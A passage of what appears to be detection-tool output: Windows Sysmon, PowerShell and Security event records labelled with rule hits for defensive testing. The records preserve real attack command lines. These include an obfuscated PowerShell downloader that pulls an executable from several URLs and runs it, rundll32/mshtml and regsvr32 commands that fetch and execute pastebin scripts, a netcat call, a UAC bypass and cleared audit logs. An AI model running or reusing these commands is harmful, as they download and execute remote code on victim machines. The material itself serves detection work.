(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-069C-5E76-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-08DA-5E76-0000-001054382E00","ParentProcessId":2632,"ProcessGuid":"747F3D96-0A33-5E76-0000-0010B8813D00","ProcessId":3696,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 12:36:03.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244341,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:03.901088Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 
1337","Company":"?","CurrentDirectory":"c:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-06A4-5E76-0000-002087DE0200","LogonId":"0x2de87","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-06EF-5E76-0000-0010DC301A00","ParentProcessId":6236,"ProcessGuid":"747F3D96-0A36-5E76-0000-0010C8923D00","ProcessId":488,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 12:36:06.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":244342,"Execution_attributes":{"ProcessID":2844,"ThreadID":3648},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T12:36:06.990686Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Fax Service DLL Search Order 
Hijack"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=9D1873AEFC3F59E649F3FB822C1FA3D52C39970E,MD5=9B97E05E67107AA18BBF3E4F5F121B2B,SHA256=9915C62360EFF866C09072AF754FA70A9BD4BF4A73CDB4048F415002F7256AD0,IMPHASH=DF1295012B8EB2127DC3667CF1881634","Image":"C:\\Windows\\System32\\FXSSVC.exe","ImageLoaded":"C:\\Windows\\System32\\Ualapi.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-E8A7-5F26-0000-0010230D1A00","ProcessId":5252,"Product":"?","RuleName":"","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2020-08-02 16:24:07.483"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":339882,"Execution_attributes":{"ProcessID":3200,"ThreadID":3596},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:07.551366Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-E308-5F26-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-E8BA-5F26-0000-001035BE1A00","ParentProcessId":8104,"ProcessGuid":"747F3D96-E8BC-5F26-0000-0010F7C41A00","ProcessId":588,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-02 16:24:28.637"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":339891,"Execution_attributes":{"ProcessID":3200,"ThreadID":3032},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-02T16:24:28.640990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k LocalService -p -s fdPHost","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-90AF-610F-0000-0020E5030000","LogonId":"0x3e5","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-182D-610F-0000-00100344D300","ProcessId":11196,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\LOCAL SERVICE","UtcTime":"2021-08-07 23:33:01.121"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":556726,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:01.176666Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c start /min C:\\Users\\Public\\KDECO.bat reg delete hkcu\\Environment /v windir /f && REM \\system32\\AppHostRegistrationVerifier.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1231-610F-0000-002057A80700","LogonId":"0x7a857","OriginalFileName":"Cmd.Exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1108,"ProcessGuid":"747F3D96-183B-610F-0000-0010DC6CD400","ProcessId":11324,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2021-08-07 23:33:15.285"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":557006,"Execution_attributes":{"ProcessID":3232,"ThreadID":4176},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2021-08-07T23:33:15.303423Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"fdd51159-9602-40cb-839d-c31039ebbc3a","ScriptBlockText":"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\\WOrd\\2019\\ -itemtype DIrectOry;[Net.ServicePointManager]::\"SecURi`T`ypRO`T`oCOL\" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 
neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').\"S`Plit\"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.\"d`OWN`load`FIlE\"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).\"le`NgTH\" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"DESKTOP-RIPCLIP","Correlation_attributes":{"ActivityID":"CCAD9034-7B61-0001-83CF-ADCC617BD601"},"EventID":4104,"EventRecordID":683,"Execution_attributes":{"ProcessID":6620,"ThreadID":6340},"Keywords":"0x0","Level":5,"Opcode":15,"Provider_attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"},"Security_attributes":{"UserID":"S-1-5-21-2895499743-3664716236-3399808827-1001"},"Task":2,"TimeCreated_attributes":{"SystemTime":"2020-08-26T05:09:28.845521Z"},"Version":1}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":565591,"Execution_attributes":{"ProcessID":780,"ThreadID":2472},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T23:23:37.147709Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x4fd77","SubjectUserName":"administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32853,"Execution_attributes":{"ProcessID":736,"ThreadID":1592},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:00:50.800225Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"WIN-77LTAPHIQ1R.example.corp","Correlation":null,"EventID":1102,"EventRecordID":32950,"Execution_attributes":{"ProcessID":736,"ThreadID":2372},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-01-20T07:29:57.863893Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x35312","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 
20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["HH.exe Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft® HTML Help Executable","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C","Image":"C:\\Windows\\hh.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-ABD7-5D3A-0000-001012661000","ParentProcessId":4940,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ProcessId":1504,"Product":"HTML Help","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 
07:39:14.345"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4348,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.375565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Copy From or To System32","HTML Help Shell Spawn","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c copy /Y C:\\Windows\\system32\\rundll32.exe %%TEMP%%\\out.exe > nul && %%TEMP%%\\out.exe javascript:\"\\..\\mshtml RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://pastebin.com/raw/y2CjnRtH\",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im out.exe\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record 
N104F.chm","ParentImage":"C:\\Windows\\hh.exe","ParentProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ParentProcessId":1504,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001004D84E00","ProcessId":5548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4353,"Execution_attributes":{"ProcessID":5924,"ThreadID":6056},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-26T07:39:14.935857Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" zipfldr.dll,RouteTheCall c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 14 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-268F-5CD8-0000-0010F4A51700","ParentProcessId":1256,"ProcessGuid":"365ABB72-269E-5CD8-0000-001084F81A00","ProcessId":2728,"Product":"Microsoft® 
Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:58:54.772"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16443,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:58:54.897009Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Calculator","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe","ParentImage":"C:\\Windows\\System32\\pcalua.exe","ParentProcessGuid":"365ABB72-517E-5CD8-0000-001024D61700","ParentProcessId":2952,"ProcessGuid":"365ABB72-517E-5CD8-0000-00105FE01700","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
17:01:50.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16498,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:01:51.007950Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-6693-5CD8-0000-0010AE4C0E00","ParentProcessId":3528,"ProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ProcessId":1420,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
18:35:05.140"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16792,"Execution_attributes":{"ProcessID":1880,"ThreadID":2020},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T18:35:05.155949Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA 